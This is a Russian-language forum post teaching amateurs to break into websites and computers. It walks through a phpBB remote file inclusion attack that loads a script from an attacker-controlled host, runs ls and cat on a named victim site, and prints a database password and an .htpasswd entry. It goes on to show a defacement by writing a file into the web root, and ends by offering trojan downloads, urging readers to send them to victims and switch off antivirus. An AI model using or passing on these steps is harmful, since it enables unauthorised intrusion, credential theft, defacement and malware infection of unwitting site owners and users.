Ну раз ты Игорёк задал такой вопрос, то постараюсь обяснить как полутше. Вопервых зависит от того какой ето сайт. Если ето хост, то уж извини до етого я еще недошёл. Если незнаеш че ето хост, так ето большой серв, который публикует сайты. Ето я на понятном... Но уж если ето приватный сервер, и ты знаеш че делать, то береги его мама дорогая... Вот например у меня серв приватный, но на нем такая защита че хер возмёш, но есть такие чайники че ваще незнают че ето такое... Узнать можно приватный ли ето серв, так - Если ссылка выглядит так : http://blabla.com, то ты набираеш - www.blabla.com, и если незаходит, то ты нашёл себе жертву... (Незабудь че http://blabla.com просто ссылка на угад!) А дальше гадай его порт.. Вообщето ето обычно 80-й порт. Для уверености набери http://blabla.com:80 (:80 указыват порт подключения к серверу). Вообщето если ето не 80-й, то в конце будет написан порт, и нечего гадать ненадо. Но у него могут быть еще и FTP серверы, они на 21-ом порту. Но одна трудность в том что ты незнаеш где и что он хранит, например название папки, альше все за тобой, сиди и гадай... напимер: http://blabla.com/mypornos (где mypornos ето папка) :) :) :) Угадал? Так качай! Есть прога Download Master (качать тут) установил? Слева в верху есть URL, ставиш туда адресс найденой тобой папки, например http://blabla.com/video , и через пару минут она у тебя! У меня есть пару Троянчиков, с помощю етих деток можно покорить любой комп :) :) :) . Я их в конце добавлю. Конечно ето не все способы, я ведь не профи... Есть еще способ ломки Форумов... Я ето уже писал. так че просто перекопирую!
Поехали!!!

'full_forum_path/includes/db.php?phpbb_root_path=full_script_path'

full_forum_path - это полный путь к форуму (Например, http://devilserver.jconserv.net/index.php )
full_script_path - это полный путь к скрипту
Итак, надеюсь мысли уже появились? Угу, подменить скрипт на свой и указать его месторасположение.
Пункт номер один или пишем скрипт.
Откройте Ваш любимый редактор и напишите в нем строчку следующего содержания:

Теперь файлик с этой строкой сохраняем под именем mysql.txt Теперь залезаем на какой-нибудь бесплатный хостинговый сайт и регим себе сайт. создаем в корне папкку с именем db и кидаем туда файл mysql.txt На самом деле, я уже все это сделал за Вас. Скрипт лежит там же, где лежат трояны, т.е. на devilserver.no-ip.org

Пункт номер два или пора рутить.
С данного момента все пояснения буду проводить на примере конкретного сайта. Жертвой я выбрал http://realmsoflegend.net Во-первых буржуйский, а во вторых просто мне не понравился. И так. Вводим в броузер :
http://realmsoflegend.net/phpBB2/includes/db.php?p...l&phpEx=txt&cmd=ls%20../%20-al

И что же мы видим? Команда ls ../ -al отлично сработала. Хмм кто не знает юниксовых команд, советую подучить. Команда ls - показывает содержимое каталога (-al параметры) Команда cat - посмотреть содержимое файла. Посмотрим что у нас в config.php

http://realmsoflegend.net/phpBB2/includes/db.php?p...Ex=txt&cmd=cat%20../config.php

Вот тут начинаются трудности... Тэг

 почему-то не сработал. Поэтому что-бы посмотреть содержимое файла config.php надо нажать View Source

 в эксплорере. Короче посмотреть что-же на самом деле выдал броузер. А выдал он следующее:






Fatal error: Cannot instantiate non-existent class:

 sql_db in /usr/local/httpd/htdocs/realmsoflegend.net/phpBB2/includes/db.php on line 55




Ну наши потуги были не бессмысленными. Мы узнали пароль от базы данных - 

rolpass.. Хмм Идем дальше поднимаемся на уровень выше и видим файлик .htpasswd 

=) Интересно что там? Посмотрим...



http://realmsoflegend.net/phpBB2/includes/db.php?p...=txt&cmd=cat%20../../.htpasswd



А вот что : jesse:hlXYungXL2xM6

Славненько, но пасс расшифровывать в падлу...

Теперь пора дефэйсить. Я не хотел морать себе руки в дефейсе этого сайта, 

поэтому просто создал файл в корне index1.php Сделал я это так:



http://realmsoflegend.net/phpBB2/includes/db.php?p...Hacked'%20>%20../../index1.php



Подобным образом вы можете написать и поверх в файл index.php Теперь о некоторых тонкостях. 

Если вы хотите придать дефэйсу красочность, то потребуется графика. Ничего загружать не надо.

 Достаточно просто сделать картинку размером эдак 800 на 640 или более, положить ее на свой сервер..

 Далее слепить файл, который будет содержать одну строчку  

Только когда будете юзать echo используйте перед знаками > и < знак / Ну вот и все =)



Так а терь за троянчиков. Тут Клиент и Сервер, ето токо два файла .EXE . 

Все остальное ето исходной код, тоесть забейте вам ёще рано, просто нелапайте!!!

Все се вам надо сделать ето передать файл Project.exe из папки Сервер вашей жертве, и узнать её Айпи. 

А дальше ууу... Балдеем! Узнать Айпи очень легко у балванов, просто дай ему зайти сюда 

 http://myip.ru и сказать вам что там написано... Ну уж если нет, то можно узнат через ICQsnifer

 и ёще много, токо вот мне впадлу... Сами поищите...



Внимание! При закачки анти вирус выключать!



Качаем : 

Тороян номер 1:

Клиент 

Сервер 



Троян номер 2:

Клиент+Сервер 



Троян номер 3:

Клиент+Сервер